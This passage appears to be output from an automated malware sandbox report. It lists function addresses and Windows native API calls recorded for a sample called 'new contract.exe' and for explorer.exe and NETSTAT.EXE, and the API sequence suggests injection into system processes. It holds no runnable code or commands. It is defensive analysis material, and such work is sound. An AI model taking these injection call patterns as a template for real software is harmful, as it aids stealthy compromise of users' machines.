          Source: C:\Windows\explorer.exeCode function: 3_2_0E4E4E12 NtProtectVirtualMemory,3_2_0E4E4E12
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4E3232 NtCreateFile,3_2_0E4E3232
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4E4E0A NtProtectVirtualMemory,3_2_0E4E4E0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182B60 NtClose,LdrInitializeThunk,5_2_03182B60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03182BF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182BE0 NtQueryValueKey,LdrInitializeThunk,5_2_03182BE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182AD0 NtReadFile,LdrInitializeThunk,5_2_03182AD0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182F30 NtCreateSection,LdrInitializeThunk,5_2_03182F30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182FE0 NtCreateFile,LdrInitializeThunk,5_2_03182FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_03182EA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182D10 NtMapViewOfSection,LdrInitializeThunk,5_2_03182D10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182DD0 NtDelayExecution,LdrInitializeThunk,5_2_03182DD0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03182DF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03182C70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182C60 NtCreateKey,LdrInitializeThunk,5_2_03182C60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_03182CA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031835C0 NtCreateMutant,LdrInitializeThunk,5_2_031835C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03184340 NtSetContextThread,5_2_03184340
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03184650 NtSuspendThread,5_2_03184650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182B80 NtQueryInformationFile,5_2_03182B80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182BA0 NtEnumerateValueKey,5_2_03182BA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182AB0 NtWaitForSingleObject,5_2_03182AB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182AF0 NtWriteFile,5_2_03182AF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182F60 NtCreateProcessEx,5_2_03182F60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182F90 NtProtectVirtualMemory,5_2_03182F90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182FB0 NtResumeThread,5_2_03182FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182FA0 NtQuerySection,5_2_03182FA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182E30 NtWriteVirtualMemory,5_2_03182E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182E80 NtReadVirtualMemory,5_2_03182E80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182EE0 NtQueueApcThread,5_2_03182EE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182D00 NtSetInformationFile,5_2_03182D00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182D30 NtUnmapViewOfSection,5_2_03182D30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182DB0 NtEnumerateKey,5_2_03182DB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182C00 NtQueryInformationProcess,5_2_03182C00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182CC0 NtQueryVirtualMemory,5_2_03182CC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03182CF0 NtOpenProcess,5_2_03182CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03183010 NtOpenDirectoryObject,5_2_03183010
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03183090 NtSetValueKey,5_2_03183090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031839B0 NtGetContextThread,5_2_031839B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03183D10 NtOpenProcessToken,5_2_03183D10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03183D70 NtOpenThread,5_2_03183D70
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052A320 NtCreateFile,5_2_0052A320
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052A3D0 NtReadFile,5_2_0052A3D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052A450 NtClose,5_2_0052A450
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052A500 NtAllocateVirtualMemory,5_2_0052A500
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052A2DA NtCreateFile,5_2_0052A2DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052A44A NtClose,5_2_0052A44A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02DB9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,5_2_02DB9BAF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02DBA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,5_2_02DBA036
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02DB9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_02DB9BB2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02DBA042 NtQueryInformationProcess,5_2_02DBA042
          Source: C:\Users\user\Desktop\new contract.exeCode function: 0_2_077B07B00_2_077B07B0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 0_2_077A4D3B0_2_077A4D3B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 0_2_014BD5BC0_2_014BD5BC
          Source: C:\Users\user\Desktop\new contract.exeCode function: 0_2_079883480_2_07988348
          Source: C:\Users\user\Desktop\new contract.exeCode function: 0_2_07981E180_2_07981E18
          Source: C:\Users\user\Desktop\new contract.exeCode function: 0_2_07981E280_2_07981E28
          Source: C:\Users\user\Desktop\new contract.exeCode function: 0_2_079836680_2_07983668
          Source: C:\Users\user\Desktop\new contract.exeCode function: 0_2_07983AA00_2_07983AA0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 0_2_079822600_2_07982260
          Source: C:\Users\user\Desktop\new contract.exeCode function: 0_2_079819F00_2_079819F0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 0_2_079819E10_2_079819E1
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041E8032_2_0041E803
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041E1C72_2_0041E1C7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041DD0B2_2_0041DD0B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_00402D882_2_00402D88
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041E5A52_2_0041E5A5
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_00409E4D2_2_00409E4D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_00409E502_2_00409E50
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0041D7342_2_0041D734
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B81582_2_016B8158
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016201002_2_01620100
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CA1182_2_016CA118
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E81CC2_2_016E81CC
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F01AA2_2_016F01AA
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E41A22_2_016E41A2
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C20002_2_016C2000
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016EA3522_2_016EA352
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F03E62_2_016F03E6
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163E3F02_2_0163E3F0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D02742_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B02C02_2_016B02C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016305352_2_01630535
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F05912_2_016F0591
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E24462_2_016E2446
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D44202_2_016D4420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016DE4F62_2_016DE4F6
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016307702_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016547502_2_01654750
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162C7C02_2_0162C7C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164C6E02_2_0164C6E0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016469622_2_01646962
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016329A02_2_016329A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016FA9A62_2_016FA9A6
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163A8402_2_0163A840
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016328402_2_01632840
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E8F02_2_0165E8F0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016168B82_2_016168B8
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016EAB402_2_016EAB40
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E6BD72_2_016E6BD7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162EA802_2_0162EA80
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163AD002_2_0163AD00
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CCD1F2_2_016CCD1F
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162ADE02_2_0162ADE0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01648DBF2_2_01648DBF
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630C002_2_01630C00
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01620CF22_2_01620CF2
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0CB52_2_016D0CB5
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A4F402_2_016A4F40
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01672F282_2_01672F28
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01650F302_2_01650F30
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D2F302_2_016D2F30
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01622FC82_2_01622FC8
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016AEFA02_2_016AEFA0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630E592_2_01630E59
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016EEE262_2_016EEE26
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016EEEDB2_2_016EEEDB
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01642E902_2_01642E90
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016ECE932_2_016ECE93
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016FB16B2_2_016FB16B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0166516C2_2_0166516C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161F1722_2_0161F172
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163B1B02_2_0163B1B0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E70E92_2_016E70E9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016EF0E02_2_016EF0E0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016DF0CC2_2_016DF0CC
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016370C02_2_016370C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161D34C2_2_0161D34C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E132D2_2_016E132D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0167739A2_2_0167739A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D12ED2_2_016D12ED
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164D2F02_2_0164D2F0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164B2C02_2_0164B2C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016352A02_2_016352A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E75712_2_016E7571
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F95C32_2_016F95C3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CD5B02_2_016CD5B0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016214602_2_01621460
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016EF43F2_2_016EF43F
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016EF7B02_2_016EF7B0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016756302_2_01675630
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E16CC2_2_016E16CC
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016399502_2_01639950
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164B9502_2_0164B950
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C59102_2_016C5910
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169D8002_2_0169D800
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016338E02_2_016338E0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016EFB762_2_016EFB76
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A5BF02_2_016A5BF0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0166DBF92_2_0166DBF9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164FB802_2_0164FB80
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A3A6C2_2_016A3A6C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016EFA492_2_016EFA49
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E7A462_2_016E7A46
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016DDAC62_2_016DDAC6
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016CDAAC2_2_016CDAAC
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01675AA02_2_01675AA0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D1AA32_2_016D1AA3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E7D732_2_016E7D73
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01633D402_2_01633D40
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E1D5A2_2_016E1D5A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164FDC02_2_0164FDC0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A9C322_2_016A9C32
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016EFCF22_2_016EFCF2
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016EFF092_2_016EFF09
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_015F3FD52_2_015F3FD5
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_015F3FD22_2_015F3FD2
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016EFFB12_2_016EFFB1
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01631F922_2_01631F92
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01639EB02_2_01639EB0
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4E32323_2_0E4E3232
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4E20363_2_0E4E2036
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4D90823_2_0E4D9082
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4DAD023_2_0E4DAD02
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4E09123_2_0E4E0912
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4DDB303_2_0E4DDB30
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4DDB323_2_0E4DDB32
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4E65CD3_2_0E4E65CD
          Source: C:\Windows\explorer.exeCode function: 3_2_0FB3CB323_2_0FB3CB32
          Source: C:\Windows\explorer.exeCode function: 3_2_0FB3CB303_2_0FB3CB30
          Source: C:\Windows\explorer.exeCode function: 3_2_0FB422323_2_0FB42232
          Source: C:\Windows\explorer.exeCode function: 3_2_0FB455CD3_2_0FB455CD
          Source: C:\Windows\explorer.exeCode function: 3_2_0FB3F9123_2_0FB3F912
          Source: C:\Windows\explorer.exeCode function: 3_2_0FB39D023_2_0FB39D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0FB380823_2_0FB38082
          Source: C:\Windows\explorer.exeCode function: 3_2_0FB410363_2_0FB41036
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_006821675_2_00682167
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_006817155_2_00681715
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0320A3525_2_0320A352
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032103E65_2_032103E6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0315E3F05_2_0315E3F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031F02745_2_031F0274
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031D02C05_2_031D02C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031EA1185_2_031EA118
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031401005_2_03140100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031D81585_2_031D8158
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032101AA5_2_032101AA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032081CC5_2_032081CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031E20005_2_031E2000
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031747505_2_03174750
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031507705_2_03150770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0314C7C05_2_0314C7C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0316C6E05_2_0316C6E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031505355_2_03150535
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032105915_2_03210591
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031F44205_2_031F4420
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032024465_2_03202446
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031FE4F65_2_031FE4F6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0320AB405_2_0320AB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03206BD75_2_03206BD7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0314EA805_2_0314EA80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031669625_2_03166962
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0321A9A65_2_0321A9A6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031529A05_2_031529A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031528405_2_03152840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0315A8405_2_0315A840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031368B85_2_031368B8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0317E8F05_2_0317E8F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03170F305_2_03170F30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031F2F305_2_031F2F30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03192F285_2_03192F28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031C4F405_2_031C4F40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031CEFA05_2_031CEFA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03142FC85_2_03142FC8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0320EE265_2_0320EE26
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03150E595_2_03150E59
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03162E905_2_03162E90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0320CE935_2_0320CE93
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0320EEDB5_2_0320EEDB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031ECD1F5_2_031ECD1F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0315AD005_2_0315AD00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03168DBF5_2_03168DBF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0314ADE05_2_0314ADE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03150C005_2_03150C00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031F0CB55_2_031F0CB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03140CF25_2_03140CF2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0320132D5_2_0320132D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0313D34C5_2_0313D34C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0319739A5_2_0319739A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031552A05_2_031552A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0316B2C05_2_0316B2C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0316D2F05_2_0316D2F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031F12ED5_2_031F12ED
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0321B16B5_2_0321B16B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0313F1725_2_0313F172
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0318516C5_2_0318516C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0315B1B05_2_0315B1B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0320F0E05_2_0320F0E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032070E95_2_032070E9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031FF0CC5_2_031FF0CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031570C05_2_031570C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0320F7B05_2_0320F7B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032016CC5_2_032016CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032075715_2_03207571
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031ED5B05_2_031ED5B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0320F43F5_2_0320F43F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031414605_2_03141460
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0320FB765_2_0320FB76
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0316FB805_2_0316FB80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0318DBF95_2_0318DBF9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031C5BF05_2_031C5BF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03207A465_2_03207A46
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0320FA495_2_0320FA49
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031C3A6C5_2_031C3A6C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031EDAAC5_2_031EDAAC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03195AA05_2_03195AA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031F1AA35_2_031F1AA3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031FDAC65_2_031FDAC6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031E59105_2_031E5910
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031599505_2_03159950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0316B9505_2_0316B950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031BD8005_2_031BD800
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031538E05_2_031538E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0320FF095_2_0320FF09
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03151F925_2_03151F92
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0320FFB15_2_0320FFB1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03159EB05_2_03159EB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03207D735_2_03207D73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03153D405_2_03153D40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03201D5A5_2_03201D5A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0316FDC05_2_0316FDC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_031C9C325_2_031C9C32
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0320FCF25_2_0320FCF2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052E1C75_2_0052E1C7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052E5A55_2_0052E5A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052D7345_2_0052D734
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052E8035_2_0052E803
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0052DD0B5_2_0052DD0B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_00512D905_2_00512D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_00512D885_2_00512D88
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_00519E505_2_00519E50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_00519E4D5_2_00519E4D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_00512FB05_2_00512FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02DBA0365_2_02DBA036
